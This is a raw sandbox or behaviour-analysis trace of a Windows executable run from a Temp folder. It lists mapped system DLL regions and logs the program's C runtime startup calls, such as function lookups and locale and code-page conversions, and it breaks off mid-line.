"" Region: id = 988 start_va = 0x73f80000 end_va = 0x73f87fff entry_point = 0x73f820f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 989 start_va = 0x73f90000 end_va = 0x73febfff entry_point = 0x73fcf798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 990 start_va = 0x73ff0000 end_va = 0x7402efff entry_point = 0x7401de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 991 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 992 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 993 start_va = 0x320000 end_va = 0x386fff entry_point = 0x320000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 994 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 995 start_va = 0x753a0000 end_va = 0x753abfff entry_point = 0x753a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 996 start_va = 0x753b0000 end_va = 0x7540ffff entry_point = 0x753ca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 997 start_va = 0x756c0000 end_va = 0x757cffff entry_point = 0x756d32d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 998 start_va = 0x757d0000 end_va = 0x757e8fff entry_point = 0x757d4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 999 start_va = 0x75800000 end_va = 0x75845fff entry_point = 0x75807478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1000 start_va = 0x75a50000 end_va = 0x75adffff entry_point = 0x75a66343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1001 start_va = 0x75c60000 end_va = 0x75d5ffff entry_point = 0x75c7b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1002 start_va = 0x75e80000 end_va = 0x75f6ffff entry_point = 0x75e90569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1003 start_va = 0x76200000 end_va = 0x7635bfff entry_point = 0x7624ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1004 start_va = 0x77140000 end_va = 0x771ebfff entry_point = 0x7714a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1005 start_va = 0x77310000 end_va = 0x773acfff entry_point = 0x77343fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1006 start_va = 0x773b0000 end_va = 0x7744ffff entry_point = 0x773c49e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1007 start_va = 0x77450000 end_va = 0x7756efff entry_point = 0x0 region_type = private name = "private_0x0000000077450000" filename = "" Region: id = 1008 start_va = 0x77570000 end_va = 0x77669fff entry_point = 0x0 region_type = private name = "private_0x0000000077570000" filename = "" Region: id = 1009 start_va = 0x77820000 end_va = 0x77829fff entry_point = 0x778236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1010 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1011 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1012 start_va = 0x4f0000 end_va = 0x677fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 1013 start_va = 0x75630000 end_va = 0x7568ffff entry_point = 0x7564158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1014 start_va = 0x76fb0000 end_va = 0x7707bfff entry_point = 0x76fb168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1015 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1016 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1017 start_va = 0x680000 end_va = 0x800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 1018 start_va = 0x1150000 end_va = 0x254ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 1019 start_va = 0x76360000 end_va = 0x76fa9fff entry_point = 0x763e1601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1020 start_va = 0x761a0000 end_va = 0x761f6fff entry_point = 0x761b9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1021 start_va = 0x75310000 end_va = 0x7538ffff entry_point = 0x753237c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1022 start_va = 0x420000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 1023 start_va = 0x810000 end_va = 0x8eefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 1024 start_va = 0x74c60000 end_va = 0x74c72fff entry_point = 0x74c61d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Thread: id = 41 os_tid = 0xbb8 [0104.860] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0xcc6472c0, dwHighDateTime=0x1d2ffcc)) [0104.860] GetCurrentThreadId () returned 0xbb8 [0104.860] GetCurrentProcessId () returned 0xbb4 [0104.860] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=291731960) returned 1 [0104.860] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0104.862] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x756c0000 [0104.862] GetProcAddress (hModule=0x756c0000, lpProcName="FlsAlloc") returned 0x756d4f2b [0104.862] GetProcAddress (hModule=0x756c0000, lpProcName="FlsFree") returned 0x756d359f [0104.862] GetProcAddress (hModule=0x756c0000, lpProcName="FlsGetValue") returned 0x756d1252 [0104.863] GetProcAddress (hModule=0x756c0000, lpProcName="FlsSetValue") returned 0x756d4208 [0104.863] GetProcAddress (hModule=0x756c0000, lpProcName="InitializeCriticalSectionEx") returned 0x756d4d28 [0104.863] GetProcAddress (hModule=0x756c0000, lpProcName="CreateEventExW") returned 0x7575410b [0104.863] GetProcAddress (hModule=0x756c0000, lpProcName="CreateSemaphoreExW") returned 0x75754195 [0104.863] GetProcAddress (hModule=0x756c0000, lpProcName="SetThreadStackGuarantee") returned 0x756dd31f [0104.863] GetProcAddress (hModule=0x756c0000, lpProcName="CreateThreadpoolTimer") returned 0x756eee7e [0104.863] GetProcAddress (hModule=0x756c0000, lpProcName="SetThreadpoolTimer") returned 0x7789441c [0104.864] GetProcAddress (hModule=0x756c0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x778bc50e [0104.864] GetProcAddress (hModule=0x756c0000, lpProcName="CloseThreadpoolTimer") returned 0x778bc381 [0104.864] GetProcAddress (hModule=0x756c0000, lpProcName="CreateThreadpoolWait") returned 0x756ef088 [0104.864] GetProcAddress (hModule=0x756c0000, lpProcName="SetThreadpoolWait") returned 0x778a05d7 [0104.864] GetProcAddress (hModule=0x756c0000, lpProcName="CloseThreadpoolWait") returned 0x778bca24 [0104.864] GetProcAddress (hModule=0x756c0000, lpProcName="FlushProcessWriteBuffers") returned 0x77870b8c [0104.864] GetProcAddress (hModule=0x756c0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7792fde8 [0104.865] GetProcAddress (hModule=0x756c0000, lpProcName="GetCurrentProcessorNumber") returned 0x778c1e1d [0104.865] GetProcAddress (hModule=0x756c0000, lpProcName="GetLogicalProcessorInformation") returned 0x75754761 [0104.865] GetProcAddress (hModule=0x756c0000, lpProcName="CreateSymbolicLinkW") returned 0x7574cd11 [0104.865] GetProcAddress (hModule=0x756c0000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0104.865] GetProcAddress (hModule=0x756c0000, lpProcName="EnumSystemLocalesEx") returned 0x7575424f [0104.865] GetProcAddress (hModule=0x756c0000, lpProcName="CompareStringEx") returned 0x757546b1 [0104.866] GetProcAddress (hModule=0x756c0000, lpProcName="GetDateFormatEx") returned 0x75766676 [0104.866] GetProcAddress (hModule=0x756c0000, lpProcName="GetLocaleInfoEx") returned 0x75754751 [0104.866] GetProcAddress (hModule=0x756c0000, lpProcName="GetTimeFormatEx") returned 0x757665f1 [0104.867] GetProcAddress (hModule=0x756c0000, lpProcName="GetUserDefaultLocaleName") returned 0x757547c1 [0104.867] GetProcAddress (hModule=0x756c0000, lpProcName="IsValidLocaleName") returned 0x757547e1 [0104.867] GetProcAddress (hModule=0x756c0000, lpProcName="LCMapStringEx") returned 0x757547f1 [0104.867] GetProcAddress (hModule=0x756c0000, lpProcName="GetCurrentPackageId") returned 0x0 [0104.867] GetProcAddress (hModule=0x756c0000, lpProcName="GetTickCount64") returned 0x756eeee0 [0104.867] GetProcAddress (hModule=0x756c0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0104.868] GetProcAddress (hModule=0x756c0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0104.868] GetCurrentThreadId () returned 0xbb8 [0104.869] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x406124, hStdOutput=0xdcd5f444, hStdError=0x0)) [0104.869] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0104.869] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0104.869] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0104.869] GetCommandLineA () returned="\"C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe\" " [0104.869] GetEnvironmentStringsW () returned 0x233158 [0104.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1536, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1536 [0104.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1536, lpMultiByteStr=0x233d60, cbMultiByte=1536, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1536 [0104.869] FreeEnvironmentStringsW (penv=0x233158) returned 1 [0104.869] GetLastError () returned 0x7f [0104.869] SetLastError (dwErrCode=0x7f) [0104.870] GetLastError () returned 0x7f [0104.870] SetLastError (dwErrCode=0x7f) [0104.870] GetLastError () returned 0x7f [0104.870] SetLastError (dwErrCode=0x7f) [0104.870] GetACP () returned 0x4e4 [0104.870] GetLastError () returned 0x7f [0104.870] SetLastError (dwErrCode=0x7f) [0104.870] IsValidCodePage (CodePage=0x4e4) returned 1 [0104.870] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fedc | out: lpCPInfo=0x18fedc) returned 1 [0104.870] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f9a4 | out: lpCPInfo=0x18f9a4) returned 1 [0104.870] GetLastError () returned 0x7f [0104.870] SetLastError (dwErrCode=0x7f) [0104.870] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0104.870] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f728, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0104.870] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9b8 | out: lpCharType=0x18f9b8) returned 1 [0104.871] GetLastError () returned 0x7f [0104.871] SetLastError (dwErrCode=0x7f) [0104.871] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0104.871] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0104.871] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0104.871] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0104.871] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fcb8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÄõÕÜôþ\x18", lpUsedDefaultChar=0x0) returned 256 [0104.871] GetLastError () returned 0x7f [0104.871] SetLastError (dwErrCode=0x7f) [0104.871] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0104.871] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0104.871] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0104.871] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0104.872] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fbb8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f 